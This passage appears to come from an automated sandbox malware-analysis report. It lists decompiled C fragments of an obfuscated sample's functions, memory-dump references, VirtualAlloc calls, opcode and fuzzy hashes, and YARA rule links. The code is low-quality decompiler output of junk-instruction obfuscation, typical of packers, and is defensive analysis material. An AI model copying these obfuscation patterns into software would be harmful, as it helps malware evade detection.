				_t235 = _t233 - 1 + 1;
				asm("fdecstp");
				asm("fprem1");
				_t236 = _t235 - 1;
				_t237 = _t236 + 1;
				asm("pcmpeqb mm3, mm6");
				asm("paddusw xmm1, xmm7");
				asm("int1");
				if (0x45f5 <= 0) goto L21;
				_push(es);
			}

0x00402bdd
0x00402bdd
0x00402bdd
0x00402bdd
0x00402bdd
0x00402bde
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 69266da897428001cc4de2e31b2840b8a0820cac8201242a5dea9f9603ad3ef4
Instruction ID: 6f9327938d39990b13915a6bc5b6a438d236fc1fc168eb485698a76a6a3cea7a
Opcode Fuzzy Hash: 69266da897428001cc4de2e31b2840b8a0820cac8201242a5dea9f9603ad3ef4
Instruction Fuzzy Hash: EA51DE5192EB44CAD217292085497715948FB93343730EBBB89A7BA0F2667E0F4B30CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402C2D, Relevance: 1.6, APIs: 1, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f551fda6d58eec0269d9f1181ec5169eace2cd4b716e939a2a18f487640283
Instruction ID: d6517e07c85524b226d052eef8d3170233a66818739c868bd063a5f22c1ffb8f
Opcode Fuzzy Hash: 79f551fda6d58eec0269d9f1181ec5169eace2cd4b716e939a2a18f487640283
Instruction Fuzzy Hash: 1651BD5192DB44CAD217292085486715A48EB93343731EBBB89A7760E2A67E0F4B34DE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A38, Relevance: 1.6, APIs: 1, Instructions: 328
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00402A38(intOrPtr* __eax, void* __ebx, signed int __ecx, void* __esi, void* __fp0) {
				intOrPtr* _t59;
				void* _t61;
				void* _t63;
				signed int _t122;
				signed int _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				intOrPtr _t151;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t196;
				void* _t212;
				void* _t213;
				void* _t268;
				void* _t287;
				void* _t288;

				_t59 = __eax;
				_t151 =  *((intOrPtr*)(__ecx - 0x40409156));
				_t122 = (__ecx ^ 0x005dab83) - 1 + 1;
				asm("fclex");
				asm("psrlq xmm7, 0xf4");
				asm("clc");
				_t123 = _t122 ^ 0x0043d501;
				_t287 = __fp0 - st3;
				asm("f2xm1");
				_t153 = _t151 - 1 + 1;
				asm("fcomp st0, st3");
				asm("emms");
				asm("cld");
				_t125 = _t123 - 0x75320;
				asm("fclex");
				asm("wait");
				_t126 = _t125 + 1;
				_t212 = __esi - 1 + 1;
				asm("fprem1");
				asm("wait");
				asm("fclex");
				asm("clc");
				do {
					_t213 = _t212 - 1;
					asm("paddusw xmm1, xmm7");
					asm("fldl2t");
					_t212 = _t213 + 1;
					_t61 = _t59 - 1 + 1;
					asm("fldl2e");
					asm("fst st1");
					_t59 = _t61 - 1;
					asm("clc");
					_t127 = _t126 - 1;
					asm("fnop");
					asm("psubusb xmm4, xmm5");
					_t126 = _t127 + 1;
					_t268 =  *_t59 - _t126;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
					asm("invalid");
				} while (_t268 != 0);
				_t154 = _t153 - 1;
				asm("fsin");
				asm("fclex");
				_t155 = _t154 + 1;
				_t63 = _t59 - 1 + 1;
				asm("fldz");
				_t288 = _t287 - st3;
				asm("pcmpgtw mm6, mm2");
				asm("fcomp st0, st3");
				asm("clc");
				asm("cld");
				asm("fxch st0, st1");
				asm("fclex");
				asm("fdecstp");
				asm("fprem1");
				_t196 = 0xfffffffff181bfbf;
				asm("pcmpeqb mm3, mm6");
				asm("paddusw xmm1, xmm7");
				asm("int1");
				if (0x45f5 <= 0) goto L26;
				_push(es);
			}

0x00402a38
0x00402a38
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402ec0
0x00402ec2
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e6e704d21a39c81b30393472e160c9c1c586e7d930c8832a51ea0b173685ffe
Instruction ID: 50294bbcd477df2c3b8c875bb42f4b01eb0eb7fa6110580fe861fbc21cf3e3f8
Opcode Fuzzy Hash: 2e6e704d21a39c81b30393472e160c9c1c586e7d930c8832a51ea0b173685ffe
Instruction Fuzzy Hash: 9661DE5192EB44CAD2072D2086486715A08FB97353730EBBB49A7760F2667E0F4B75CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402B38, Relevance: 1.6, APIs: 1, Instructions: 326memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ddccbbeea625522e087eec3c410dc509f0bc5c763b602ff01560a2a55561f575
Instruction ID: 495fe3c9c457ee7062069f5f8b8aa6b1d8bdc95b6f3e4d1dd9c069695c1c142d
Opcode Fuzzy Hash: ddccbbeea625522e087eec3c410dc509f0bc5c763b602ff01560a2a55561f575
Instruction Fuzzy Hash: 2451CD5192EB44DAD2172D2085482715948FF93343730EBBB89A7760F2667E0F8B30CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402CCB, Relevance: 1.6, APIs: 1, Instructions: 315
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00402CCB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _t178;
				void* _t180;
				void* _t182;
				void* _t296;
				void* _t297;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t365;
				void* _t366;
				void* _t421;
				void* _t439;
				void* _t440;

				_t439 = __fp0;
				_t365 = __esi;
				_t345 = __edi;
				_t321 = __edx;
				_t296 = __ecx;
				_t178 = __eax;
				while(1) {
					_t296 = _t297 + 1;
					_t421 =  *_t178 - _t296;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
					asm("invalid");
					if(_t421 != 0) {
						_t366 = _t365 - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						_t365 = _t366 + 1;
						_t180 = _t178 - 1 + 1;
						asm("fldl2e");
						asm("fst st1");
						_t178 = _t180 - 1;
						asm("clc");
						_t297 = _t296 - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						continue;
					}
					_t322 = _t321 - 1;
					asm("fsin");
					asm("fclex");
					_t323 = _t322 + 1;
					_t182 = _t178 - 1 + 1;
					asm("fldz");
					_t440 = _t439 - st3;
					_t347 = _t345 - 1 + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					_t349 = _t347 - 1 + 1;
					asm("fdecstp");
					asm("fprem1");
					_t350 = _t349 - 1;
					_t351 = _t350 + 1;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					asm("int1");
					if (0x45f5 <= 0) goto L20;
					_push(es);
				}
			}

0x00402ccb
0x00402ccb
0x00402ccb
0x00402ccb
0x00402ccb
0x00402d07
0x00402d08
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d65
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00000000
0x00402cc2
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bfccb490216f05cf854110bbef061eb8f9fe391b7f033e7d381de5ec6af4fee7
Instruction ID: 2b630f86abc9573937f78b44157cb48842ec8714cdd2a53a5afd05d34a8b3ddd
Opcode Fuzzy Hash: bfccb490216f05cf854110bbef061eb8f9fe391b7f033e7d381de5ec6af4fee7
Instruction Fuzzy Hash: C151D091A2EB44CAD2072D2085447715948EB93343731DBBF49977A0E2667D0F8B30DE

Uniqueness

Uniqueness Score: -1.00%

Function 00402AEA, Relevance: 1.6, APIs: 1, Instructions: 307
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00402AEA(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _t60;
				void* _t62;
				void* _t64;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t185;
				void* _t187;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t207;
				void* _t208;
				void* _t264;
				void* _t282;
				void* _t283;

				_t282 = __fp0;
				_t185 = __edi;
				_push(__esi);
				_t60 = __eax + 1;
				_t161 = 0xffffffffbabababa;
				asm("fcomp st0, st3");
				asm("emms");
				asm("cld");
				_t121 = __ecx - 0x75320;
				asm("fclex");
				asm("wait");
				_t122 = _t121 + 1;
				_t207 = __esi - 1 + 1;
				asm("fprem1");
				asm("wait");
				asm("fclex");
				asm("clc");
				do {
					_t208 = _t207 - 1;
					asm("paddusw xmm1, xmm7");
					asm("fldl2t");
					_t207 = _t208 + 1;
					_t62 = _t60 - 1 + 1;
					asm("fldl2e");
					asm("fst st1");
					_t60 = _t62 - 1;
					asm("clc");
					_t123 = _t122 - 1;
					asm("fnop");
					asm("psubusb xmm4, xmm5");
					_t122 = _t123 + 1;
					_t264 =  *_t60 - _t122;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
					asm("invalid");
				} while (_t264 != 0);
				_t162 = _t161 - 1;
				asm("fsin");
				asm("fclex");
				_t163 = _t162 + 1;
				_t64 = _t60 - 1 + 1;
				asm("fldz");
				_t283 = _t282 - st3;
				_t187 = _t185 - 1 + 1;
				asm("pcmpgtw mm6, mm2");
				asm("fcomp st0, st3");
				asm("clc");
				asm("cld");
				asm("fxch st0, st1");
				asm("fclex");
				_t189 = _t187 - 1 + 1;
				asm("fdecstp");
				asm("fprem1");
				_t190 = _t189 - 1;
				_t191 = _t190 + 1;
				asm("pcmpeqb mm3, mm6");
				asm("paddusw xmm1, xmm7");
				asm("int1");
				if (0x45f5 <= 0) goto L24;
				_push(es);
			}

0x00402aea
0x00402aea
0x00402aea
0x00402aec
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b40d4d008f2a42b42f0eab2de1aba0659bba4f4b7e3cec5fdcb7eb9e2ae7cbcc
Instruction ID: 9224f2cdfe27fa1f38f9e976f72847cab4d6d718ef90e5507db51781c1d660a0
Opcode Fuzzy Hash: b40d4d008f2a42b42f0eab2de1aba0659bba4f4b7e3cec5fdcb7eb9e2ae7cbcc
Instruction Fuzzy Hash: 9361BF5192EB44DAD2072D2085486715A48EF97343730EBBB49A77A0F2667E0F8B70DE

Uniqueness

Uniqueness Score: -1.00%

Function 00402D17, Relevance: 1.5, APIs: 1, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f47c594fabdd2ae359fe43fb2966d883359a5cf7f93ec08adc72655c2c753b
Instruction ID: 0e7fefd0b01779089c51865147133ac07e7f22fb00d55f5c4e1102227b120f2b
Opcode Fuzzy Hash: 68f47c594fabdd2ae359fe43fb2966d883359a5cf7f93ec08adc72655c2c753b
Instruction Fuzzy Hash: A551CD91A2EB44DAD2032D2085447715A08EB97343731EBBB4997760F2667E0F8B34DE

Uniqueness

Uniqueness Score: -1.00%

Function 00402DCB, Relevance: 1.5, APIs: 1, Instructions: 272memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5171de6306f937551e991ddfa57faaa120c8d15cbd516e0c87faa876eac6e7cd
Instruction ID: 457292127c5ccc15fd6a0061d4cca25f7210d01a70e99da74d45d86221d6d045
Opcode Fuzzy Hash: 5171de6306f937551e991ddfa57faaa120c8d15cbd516e0c87faa876eac6e7cd
Instruction Fuzzy Hash: 3651CE91A2EB44CAD2032D2085457715E08EB97343731DFBB4997BA0E2667E4F8B30DE

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC7, Relevance: 1.5, APIs: 1, Instructions: 271memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5480afc0530f1a19efcc1902fca7fc1fbee8cabcfd9ad7be8d7f3b800cdbc7cf
Instruction ID: f9ee7d358ea8701e2c62fe680c58514422a584aab5ce5d6680459db1b63446b4
Opcode Fuzzy Hash: 5480afc0530f1a19efcc1902fca7fc1fbee8cabcfd9ad7be8d7f3b800cdbc7cf
Instruction Fuzzy Hash: 0051C05172D76386C6232920C6886315928EB663A3330DBBBC557F60E1A2FD5F47319E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C80, Relevance: 1.5, APIs: 1, Instructions: 270
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00402C80(signed int __eax, signed int* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t71;
				void* _t73;
				intOrPtr _t127;
				void* _t128;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t176;
				void* _t178;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t196;
				void* _t197;
				void* _t253;
				void* _t271;
				void* _t272;

				_t271 = __fp0;
				_t196 = __esi;
				_t176 = __edi;
				_t152 = __edx;
				_t127 = __ecx;
				asm("in eax, 0xbf");
				_t69 = __eax |  *__ebx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx - 0x76767677)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x49f84889)) = __ecx;
				while(1) {
					_t69 = _t71 - 1;
					asm("clc");
					_t128 = _t127 - 1;
					asm("fnop");
					asm("psubusb xmm4, xmm5");
					_t127 = _t128 + 1;
					_t253 =  *_t69 - _t127;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
					asm("invalid");
					if(_t253 != 0) {
						_t197 = _t196 - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						_t196 = _t197 + 1;
						_t71 = _t69 - 1 + 1;
						asm("fldl2e");
						asm("fst st1");
						continue;
					}
					_t153 = _t152 - 1;
					asm("fsin");
					asm("fclex");
					_t154 = _t153 + 1;
					_t73 = _t69 - 1 + 1;
					asm("fldz");
					_t272 = _t271 - st3;
					_t178 = _t176 - 1 + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					_t180 = _t178 - 1 + 1;
					asm("fdecstp");
					asm("fprem1");
					_t181 = _t180 - 1;
					_t182 = _t181 + 1;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					asm("int1");
					if (0x45f5 <= 0) goto L20;
					_push(es);
				}
			}

0x00402c80
0x00402c80
0x00402c80
0x00402c80
0x00402c80
0x00402c80
0x00402c82
0x00402c84
0x00402c8a
0x00402c90
0x00402c96
0x00402c9c
0x00402ca2
0x00402ca8
0x00402cae
0x00402cb4
0x00402cba
0x00402cbd
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d65
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00000000
0x00402c7c
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9b7bca5bcf065e9a7ff0bb253d6409595ad7b07dbd23d8b7f85259ae91a2d571
Instruction ID: 184639570b7bd4e576e6b00284fd05f2258fe347ec769d96918224e33c0e4997
Opcode Fuzzy Hash: 9b7bca5bcf065e9a7ff0bb253d6409595ad7b07dbd23d8b7f85259ae91a2d571
Instruction Fuzzy Hash: B651CE5192E740CAD2172D2085486715E48EF93343731EBBF8997790E2667E0F8B708E

Uniqueness

Uniqueness Score: -1.00%

Function 00402E22, Relevance: 1.5, APIs: 1, Instructions: 260memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: db506596e6cfa57d750cf9d2d4a1f40be3132bcd3b327bdee39774a6f115f899
Instruction ID: 554ba14504b4ae0960c55843159be54a084abdd89d5c20a5aea10c36b9874d42
Opcode Fuzzy Hash: db506596e6cfa57d750cf9d2d4a1f40be3132bcd3b327bdee39774a6f115f899
Instruction Fuzzy Hash: 4751DE91A2EB40CAD2032D2085456715E48EB97343731EBBB49A7790E2763E0F8B30DE

Uniqueness

Uniqueness Score: -1.00%

Function 00403055, Relevance: 1.5, APIs: 1, Instructions: 247memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 72d12ef2cdddfe139dee9c1d0f47cf4b20723d46d644bf543ca97360e3c09d57
Instruction ID: cb4b4a1c746ed42770c74e62cec72b80c2574b26b623af554807536abd9b5017
Opcode Fuzzy Hash: 72d12ef2cdddfe139dee9c1d0f47cf4b20723d46d644bf543ca97360e3c09d57
Instruction Fuzzy Hash: 2241DB91A2EB44CAC2032E2085406715D48EB93303771EBBB59A7750F2727E4F8774DE

Uniqueness

Uniqueness Score: -1.00%

Function 00402E6D, Relevance: 1.5, APIs: 1, Instructions: 240
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00402E6D(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t147;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t187;
				void* _t260;

				_t260 = __fp0;
				_t187 = __esi;
				_t147 = __edx;
				_t171 = __edi - 1 + 1;
				asm("fdecstp");
				asm("fprem1");
				_t172 = _t171 - 1;
				_t173 = _t172 + 1;
				asm("pcmpeqb mm3, mm6");
				asm("paddusw xmm1, xmm7");
				asm("int1");
				if (0xb9b9b9b9 <= 0) goto L11;
				_push(es);
			}

0x00402e6d
0x00402e6d
0x00402e6d
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 982dd3735f56608ba488911314bee679995caa4de6656ecfd616b2fd999d61ce
Instruction ID: 5396201cfc1ca71b8469c74ea58a80cdbffced2e0c96922ca6d66b951b5f2561
Opcode Fuzzy Hash: 982dd3735f56608ba488911314bee679995caa4de6656ecfd616b2fd999d61ce
Instruction Fuzzy Hash: 9551DD91A2EB40CAD2032D2085457715D08EB97343731EBBF59A7790E1667D0F8B70DE

Uniqueness

Uniqueness Score: -1.00%

Function 004030FC, Relevance: 1.5, APIs: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 18578ea8d24c073fc82763dfa77576b3679f0768e490ca0a55f1fcf14aeeba2b
Instruction ID: 92a18cf66559959c27d2edd3695d9c1d3dadc50649912137aef0d453a98e7a53
Opcode Fuzzy Hash: 18578ea8d24c073fc82763dfa77576b3679f0768e490ca0a55f1fcf14aeeba2b
Instruction Fuzzy Hash: F041BA91A2EB44DAC2032E3184446719D48EBD3343331DBBF59A3754F2667E4F87749A

Uniqueness

Uniqueness Score: -1.00%

Function 00403195, Relevance: 1.5, APIs: 1, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 24c779ef5db0932a4fcf8fbd0c6473d80a6109c42841774e2f1fcb36745595c3
Instruction ID: 2faf9d4ac3edb672623a55577eba52c972e40168ffc1ef7ca60177f84bb62d75
Opcode Fuzzy Hash: 24c779ef5db0932a4fcf8fbd0c6473d80a6109c42841774e2f1fcb36745595c3
Instruction Fuzzy Hash: A9319B91A2E644DAC2132E3185446715E48EBD3303331DBBF9967764E2A63E4F8734DA

Uniqueness

Uniqueness Score: -1.00%

